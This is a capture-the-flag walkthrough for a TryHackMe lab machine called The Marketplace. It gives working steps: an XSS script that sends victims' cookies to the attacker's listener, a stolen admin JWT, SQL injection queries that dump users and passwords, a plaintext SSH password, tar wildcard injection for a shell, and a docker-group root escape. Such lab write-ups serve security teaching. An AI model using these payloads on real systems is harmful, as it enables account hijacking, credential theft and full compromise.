The Marketplace

Room Link: https://tryhackme.com/room/marketplace

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM:32768 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/32768 - HTTP

Kali

gobuster dir -u http://$VICTIM:32768 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

XSS - Steal JVT

https://jwt.io/

I tried updating the token it didn't work

Next we're going to try to steal the JWT from another user.

Kali

nc -lvnp 4444

Browser

<script>document.location='http://$KALI:4444/XSS/grabber.php?c='+document.cookie</script>

This was annoying because if I went to my posts it wouldn't work so I went to Jakes post and changed the number from 2 to 6 to get to the report page. Then just clicked the report button

we got a token from a user that isn't us

We can see it is from Michael who is an admin.

Sent again but this time just forwarded the request so we could see what that script was doing

The script was printing the flag

This wasn't working before but after next time I went to this box tried I could just update the cookie from the browser and it worked.

Brower cookie

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9.O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YY

We add a order by and increase the number until we get an error to reveal how many fields there are.

After 5 it give us an error so we know there are four fields

We do a union select, first to try to show our 1s which isn't working because the first part of the statement runs successfully so theres no where to put our info

To work around this we make the userid as 0 which probably doesn't exist and we can start seeing our 1s

Get Version

Get Database

Get tables

UNION SELECT table_name,1,1,1 FROM information_schema.tables WHERE table_schema=database()

Get All tables by concat

-1 UNION SELECT group_concat(table_name),1,1,1%20 FROM information_schema.tables WHERE table_schema =database()

Get Columns for table users

-1%20UNION%20SELECT%20group_concat(column_name,column_type),1,1,1%20%20FROM%20information_schema.columns%20WHERE%20table_schema=marketplace

Get Columns for table items

-1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='items' AND table_schema='marketplace'

Get Columns for table messages

-1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='messages' AND table_schema='marketplace'

Get Columns for table messages

-1%20UNION%20SELECT%20group_concat(message_content),1,1,1%20FROM%20messages

Get usernames and passwords. The passwords aren't too useful at this point but now we have some usernames.

-1%20UNION%20SELECT%20group_concat(username,%27|%27,password),1,1,1%20FROM%20users

TCP/22 - SSH

Kali

ssh jake@$VICTIM
Password: @b_ENXkGYUCAv3zJ

Lateral Movement

Exploit: https://gtfobins.github.io/gtfobins/tar/

Jake can run a backup script as michael. The script is using a wildcard which we manipulate.

We can trick the script to run this to get a shell by making empty files with similar names

Victim

cd /opt/backups
mkdir priv
cd priv
touch ./--checkpoint=1
touch ./--checkpoint-action=exec=sh shell.sh
vi shell.sh

shell.sh

#!/bin/bash

cp /bin/bash /opt/backups/michealbash;
chmod +xs  /opt/backups/michealbash;

Victim

chmod +x shell.sh 
rm -f ../backup.tar 
sudo -u michael /opt/backups/backup.sh 

Privilege Escalation

Victim(micheal)

id
find / -name docker.sock 2>/dev/null
docker images
docker run -it -v /:/host/ alpine chroot /host/ sh

michael is part of the docker group so it appears we're in a pod

There a few images to test from. I just ran the last command above and changes the image name until it worked. Exploit worked with nginx and mysql images as well.